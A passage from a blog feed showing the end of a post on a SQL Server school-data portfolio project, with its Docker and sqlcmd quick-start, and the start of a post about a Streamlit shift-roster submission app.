&lt;strong&gt;Invalid formats&lt;/strong&gt; — Phone numbers marked as '???', incomplete grades ('INC')&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This messy data simulates real school system exports (SEQTA, Synergetic) where cleaning and validation are critical.&lt;/p&gt;




&lt;h2&gt;
  
  
  Tech Stack
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Technology&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Database&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;SQL Server 2022 Express&lt;/td&gt;
&lt;td&gt;On-premise simulation (macOS via Docker)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Management&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;SSMS + sqlcmd CLI&lt;/td&gt;
&lt;td&gt;GUI and scripted operations&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Data Generation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;T-SQL CTEs + temp tables&lt;/td&gt;
&lt;td&gt;Deterministic seed data with edge cases&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Backup&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Native SQL Server backups&lt;/td&gt;
&lt;td&gt;Full/differential with RPO/RTO targets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CSV imports via BULK INSERT&lt;/td&gt;
&lt;td&gt;Simulates SEQTA/Synergetic exports&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Documentation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Markdown + Mermaid&lt;/td&gt;
&lt;td&gt;Runbooks, training guides, flowcharts&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Project Structure:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;stc_datalab/
├── sql/
│   ├── 00_create_db.sql          # Initial database creation
│   ├── 01_schema.sql             # Tables, constraints, indexes
│   ├── 02_seed_data.sql          # 1,500+ records with edge cases
│   ├── 03_views.sql              # 4 reporting views
│   ├── 04_stored_procedures.sql  # 4 parameterized SPs
│   ├── 05_import_export.sql      # CSV integration logic
│   └── 07_backup_restore.sql     # Backup/recovery procedures
├── data/
│   ├── students_import.csv       # Sample import data
│   ├── classes_import.csv
│   └── enrollments_import.csv
├── docs/
│   ├── Assessment1/              # Level 1: Setup &amp;amp; basics
│   ├── Assessment2/              # Level 2: Integration
│   └── Assessment3/              # Level 3: Operations
│       ├── 06_runbook.md         # 1,000+ line operational guide
│       ├── 07_demo_script.md     # Interview presentation
│       └── 08_staff_training_guide.md
└── screenshots/                  # 15+ annotated screenshots
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  The Impact: Confidence Through Deliverables
&lt;/h2&gt;

&lt;p&gt;This wasn't just practice—it was portfolio-building with interview-ready artifacts:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Result&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Technical documentation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3,000+ lines across 15 files&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SQL scripts&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;10 files, 800+ lines of T-SQL&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Seed data generated&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;1,562 records across 6 tables&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Views &amp;amp; procedures&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;8 reusable database objects&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Operational runbook&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;1,000+ lines with flowcharts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Training materials&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Non-technical staff guide&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Time investment&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;16 days, committed execution&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;What This Proves&lt;/strong&gt;
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Skill Category&lt;/th&gt;
&lt;th&gt;Evidence&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Database fundamentals&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Schema design with normalization, constraints, indexes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;T-SQL proficiency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CTEs, window functions, stored procedures, error handling&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Data integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CSV imports with staging, validation, rollback procedures&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Backup/recovery&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Full/differential backups, 3-stage restore validation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Documentation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Runbooks, training guides, troubleshooting flowcharts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Production mindset&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Security (least privilege), audit logging, change management&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Interview Readiness&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Instead of saying &lt;em&gt;"I can learn SQL Server"&lt;/em&gt;, I can now walk into an interview and say:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"I built a production-grade school data platform with 6 normalized tables, 8 reporting objects, comprehensive backup procedures, and operational documentation. Here's the GitHub repo, here's the demo script, and here are the 15 annotated screenshots. Let me show you the runbook."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Future Roadmap: From Simulation to Production
&lt;/h2&gt;

&lt;p&gt;While this project is interview-focused, the architecture supports real-world expansion:&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;1. Power BI Dashboard Integration&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Connect reporting views to interactive dashboards&lt;/li&gt;
&lt;li&gt;Real-time attendance monitoring with alerting&lt;/li&gt;
&lt;li&gt;Enrollment trend analysis across years&lt;/li&gt;
&lt;li&gt;Teacher workload visualization&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;2. Automated SEQTA Sync&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Scheduled SSIS packages for nightly imports&lt;/li&gt;
&lt;li&gt;Incremental updates with change data capture&lt;/li&gt;
&lt;li&gt;Email notifications on import failures&lt;/li&gt;
&lt;li&gt;Data quality scorecards&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;3. Advanced Security &amp;amp; Compliance&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Row-level security based on staff roles&lt;/li&gt;
&lt;li&gt;Transparent data encryption for medical_info&lt;/li&gt;
&lt;li&gt;Audit tables with temporal queries&lt;/li&gt;
&lt;li&gt;GDPR-compliant data retention policies&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;4. Performance Optimization&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Columnstore indexes for historical reporting&lt;/li&gt;
&lt;li&gt;Query Store analysis for slow queries&lt;/li&gt;
&lt;li&gt;Database partitioning by enrollment_year&lt;/li&gt;
&lt;li&gt;Read replicas for Power BI loads&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;5. Cloud Migration Path&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Azure SQL Database deployment&lt;/li&gt;
&lt;li&gt;Geo-replication for disaster recovery&lt;/li&gt;
&lt;li&gt;Azure Data Factory for ETL orchestration&lt;/li&gt;
&lt;li&gt;Integration with Microsoft 365 (SharePoint, Teams)&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Key Takeaways
&lt;/h2&gt;

&lt;p&gt;This project reinforced several engineering principles:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Build to prove, not just to practice&lt;/strong&gt; — Every decision was portfolio-oriented&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Documentation = Deliverable&lt;/strong&gt; — The runbook is as important as the code&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Simulate real constraints&lt;/strong&gt; — SQL Server Express limits forced production-ready design&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Edge cases reveal skill&lt;/strong&gt; — Intentional data quality issues prove validation competency&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Timeline discipline&lt;/strong&gt; — 16-day execution plan kept momentum and accountability&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  Try It Yourself
&lt;/h2&gt;

&lt;p&gt;The complete project is open source and ready to deploy:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GitHub Repo&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/stc-datalab" rel="noopener noreferrer"&gt;github.com/lfariabr/stc-datalab&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Setup Guide&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/stc-datalab/tree/main/docs/Assessment1" rel="noopener noreferrer"&gt;Assessment 1 Documentation&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Operational Runbook&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/stc-datalab/blob/main/docs/Assessment3/06_runbook.md" rel="noopener noreferrer"&gt;06_runbook.md&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Demo Script&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/stc-datalab/blob/main/docs/Assessment3/07_demo_script.md" rel="noopener noreferrer"&gt;07_demo_script.md&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Quick Start (Docker):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Clone the repo&lt;/span&gt;
git clone https://github.com/lfariabr/stc-datalab.git
&lt;span class="nb"&gt;cd &lt;/span&gt;stc-datalab

&lt;span class="c"&gt;# 2. Start SQL Server Express&lt;/span&gt;
docker run &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"ACCEPT_EULA=Y"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"MSSQL_SA_PASSWORD=StC_SchoolLab2025!"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"MSSQL_PID=Express"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-p&lt;/span&gt; 1433:1433 &lt;span class="nt"&gt;--name&lt;/span&gt; sqlserver &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-d&lt;/span&gt; mcr.microsoft.com/mssql/server:2022-latest

&lt;span class="c"&gt;# 3. Create database and schema&lt;/span&gt;
sqlcmd &lt;span class="nt"&gt;-S&lt;/span&gt; localhost &lt;span class="nt"&gt;-U&lt;/span&gt; sa &lt;span class="nt"&gt;-P&lt;/span&gt; &lt;span class="s1"&gt;'StC_SchoolLab2025!'&lt;/span&gt; &lt;span class="nt"&gt;-C&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; sql/00_create_db.sql
sqlcmd &lt;span class="nt"&gt;-S&lt;/span&gt; localhost &lt;span class="nt"&gt;-U&lt;/span&gt; sa &lt;span class="nt"&gt;-P&lt;/span&gt; &lt;span class="s1"&gt;'StC_SchoolLab2025!'&lt;/span&gt; &lt;span class="nt"&gt;-C&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; sql/01_schema.sql

&lt;span class="c"&gt;# 4. Seed demo data&lt;/span&gt;
sqlcmd &lt;span class="nt"&gt;-S&lt;/span&gt; localhost &lt;span class="nt"&gt;-U&lt;/span&gt; sa &lt;span class="nt"&gt;-P&lt;/span&gt; &lt;span class="s1"&gt;'StC_SchoolLab2025!'&lt;/span&gt; &lt;span class="nt"&gt;-C&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; sql/02_seed_data.sql

&lt;span class="c"&gt;# 5. Test reporting&lt;/span&gt;
sqlcmd &lt;span class="nt"&gt;-S&lt;/span&gt; localhost &lt;span class="nt"&gt;-U&lt;/span&gt; sa &lt;span class="nt"&gt;-P&lt;/span&gt; &lt;span class="s1"&gt;'StC_SchoolLab2025!'&lt;/span&gt; &lt;span class="nt"&gt;-C&lt;/span&gt; &lt;span class="nt"&gt;-Q&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="s2"&gt;"USE StC_SchoolLab; EXEC sp_AttendanceByDate @StartDate='2025-01-22', @EndDate='2025-01-22';"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Let's Connect!
&lt;/h2&gt;

&lt;p&gt;This project exemplifies my approach to technical challenges: structured execution, production-quality deliverables, and comprehensive documentation. If you're:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Building enterprise data systems&lt;/li&gt;
&lt;li&gt;Working with SQL Server in education/non-profit sectors&lt;/li&gt;
&lt;li&gt;Interested in data engineering best practices&lt;/li&gt;
&lt;li&gt;Hiring for database administration roles&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I'd love to connect:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;LinkedIn:&lt;/strong&gt; &lt;a href="https://www.linkedin.com/in/lfariabr/" rel="noopener noreferrer"&gt;linkedin.com/in/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/lfariabr" rel="noopener noreferrer"&gt;github.com/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Portfolio:&lt;/strong&gt; &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;strong&gt;Tech Stack Summary:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Current Implementation&lt;/th&gt;
&lt;th&gt;Production Extensions&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;SQL Server 2022 Express, SSMS, T-SQL, Docker, Markdown&lt;/td&gt;
&lt;td&gt;Azure SQL Database, SSIS, Power BI, Columnstore Indexes, TDE, Azure Data Factory&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;p&gt;&lt;em&gt;Built with 🎓 and database discipline by &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;Luis Faria&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Hard work is my preferred language and I try to speak it fluently.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>sql</category>
      <category>sqlserver</category>
      <category>database</category>
      <category>dataengineering</category>
    </item>
    <item>
      <title>myRoster: from copypaste to 2-minute submissions</title>
      <dc:creator>Luis Faria</dc:creator>
      <pubDate>Wed, 21 Jan 2026 17:12:39 +0000</pubDate>
      <link>https://forem.com/lfariaus/myroster-from-copypaste-to-2-minute-submissions-dao</link>
      <guid>https://forem.com/lfariaus/myroster-from-copypaste-to-2-minute-submissions-dao</guid>
      <description>&lt;p&gt;&lt;strong&gt;From tedious spreadsheet rituals to 2-minute submissions: how I turned a workplace pain point into a productivity multiplier.&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"The best automation isn't flashy — it's invisible. It just works."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  🎯 The Challenge:
&lt;/h2&gt;

&lt;h3&gt;
  
  
  When Spreadsheets Become a Time Sink
&lt;/h3&gt;

&lt;p&gt;If you've ever worked in shift-based operations, you know the drill. Every roster cycle, the same tedious routine: open a spreadsheet, manually tick boxes for every single day you're available, triple-check you didn't miss anything, export it, draft an email, attach the file, and finally hit send. Rinse and repeat, week after week. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmdbgehalj1cfzmzdnjsr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmdbgehalj1cfzmzdnjsr.png" alt="Email asking for availability" width="800" height="462"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For one HR team I've met, this process was eating up valuable time that could have been spent on actual work:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pain Point&lt;/th&gt;
&lt;th&gt;Impact&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Manual entry&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;15-20 minutes per roster cycle per employee&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Inconsistent formats&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;HR receives varied submissions, coordination nightmare&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Error-prone&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Missed dates, wrong shifts, duplicate entries&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Soul-crushing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Nobody looks forward to roster week&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;I saw this inefficiency firsthand and thought: &lt;em&gt;There has to be a better way.&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Spoiler:&lt;/strong&gt; There was.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  🤖 The Solution:
&lt;/h2&gt;

&lt;h3&gt;
  
  
  &lt;em&gt;myRoster&lt;/em&gt;: Automation Meets Simplicity
&lt;/h3&gt;

&lt;p&gt;That's when &lt;strong&gt;myRoster&lt;/strong&gt; was born: A lightweight and intuitive web application that transforms shift availability submission from a chore into a 2-minute task. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu678436flo6v69l7nbp8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu678436flo6v69l7nbp8.png" alt="myRoster Web App" width="800" height="1235"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;How It Works&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;myRoster is built as a &lt;strong&gt;Streamlit-powered&lt;/strong&gt; web app that runs entirely in the browser. No complex installations, no training sessions—just open the link and you're ready to go. Here's what makes it tick:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Smart Roster Period Calculation&lt;/strong&gt; &lt;br&gt;
The app automatically calculates the next roster cycle based on HR's scheduling logic. No more guessing which dates to fill out—the system knows exactly what period you're submitting for, starting from the Monday three weeks ahead and spanning a full 4-week cycle.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Interactive Spreadsheet Interface&lt;/strong&gt; &lt;br&gt;
Instead of static forms, users interact with a familiar spreadsheet-like grid. Each week is organized in collapsible sections, showing dates, days of the week, and three shift columns (7am-3pm, 3pm-11pm, 11pm-7am). Just click the checkboxes for your available shifts—no hunting through dropdowns or typing dates manually.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. One-Click Weekly Shortcuts&lt;/strong&gt; &lt;br&gt;
Need to mark yourself available for all morning shifts in a week? One button. Want to clear an entire week? Another click. These shortcuts eliminate repetitive clicking, cutting entry time by more than half.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Real-Time Progress Tracking&lt;/strong&gt; &lt;br&gt;
As you make selections, myRoster instantly updates your coverage statistics—showing total shifts selected, number of days covered, and a visual progress bar. You know exactly where you stand before submitting.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. One-Click Submission&lt;/strong&gt; &lt;br&gt;
Hit "Preview &amp;amp; Submit," and myRoster generates a clean CSV file, automatically emails it to HR with a professional HTML template, and optionally sends you a copy. The entire process—from opening the app to hitting send—takes under 2 minutes.&lt;/p&gt;
&lt;h3&gt;
  
  
  Tech Stack
&lt;/h3&gt;

&lt;p&gt;I kept the technology intentionally lean:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Technology&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Backend&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Python 3.10+&lt;/td&gt;
&lt;td&gt;Core logic, date calculations&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Frontend&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Streamlit&lt;/td&gt;
&lt;td&gt;Interactive web UI, zero JS needed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Data&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pandas&lt;/td&gt;
&lt;td&gt;Shift matrices, CSV export&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Email&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Gmail SMTP (GCP)&lt;/td&gt;
&lt;td&gt;Automated delivery&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deployment&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Streamlit Cloud&lt;/td&gt;
&lt;td&gt;One-click deploy from GitHub&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Project Structure:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;myRoster/
├── app.py                    # Main Streamlit entry point
├── views/
│   └── rosterView.py         # UI components
├── helpers/
│   └── roster.py             # Date calculations
└── services/
    └── email.py              # Email automation
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The modular architecture makes it easy to extend features or adapt for different scheduling needs.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Impact: Time Saved, Efficiency Gained
&lt;/h2&gt;

&lt;p&gt;The results speak for themselves:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Before&lt;/th&gt;
&lt;th&gt;After&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Submission time&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;15-20 minutes&lt;/td&gt;
&lt;td&gt;~2 minutes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Format consistency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Varies by employee&lt;/td&gt;
&lt;td&gt;100% standardized&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Error rate&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Frequent&lt;/td&gt;
&lt;td&gt;Zero&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Employee satisfaction&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Dreaded task&lt;/td&gt;
&lt;td&gt;Quick and painless&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Future Roadmap: From MVP to Platform
&lt;/h2&gt;

&lt;p&gt;While myRoster already delivers significant value in its current form, there's immense potential to evolve it from a standalone tool into a comprehensive workforce management platform. Here's what I've mapped out:&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;1. Multi-Provider Email Infrastructure&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Current state:&lt;/strong&gt; Relies solely on Gmail SMTP via Google Cloud Platform &lt;br&gt;
&lt;strong&gt;Next iteration:&lt;/strong&gt; Integration with &lt;a href="https://resend.com" rel="noopener noreferrer"&gt;Resend&lt;/a&gt; for more reliable transactional email delivery&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why this matters:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Automated reminders&lt;/strong&gt;: Schedule notifications 48 hours before roster deadlines&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Smart alerts&lt;/strong&gt;: Notify HR when submissions are incomplete or coverage is below threshold&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Employee confirmations&lt;/strong&gt;: Send automatic receipts when availability is successfully submitted&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Higher deliverability&lt;/strong&gt;: Resend offers better inbox placement and detailed analytics compared to SMTP&lt;/li&gt;
&lt;/ul&gt;

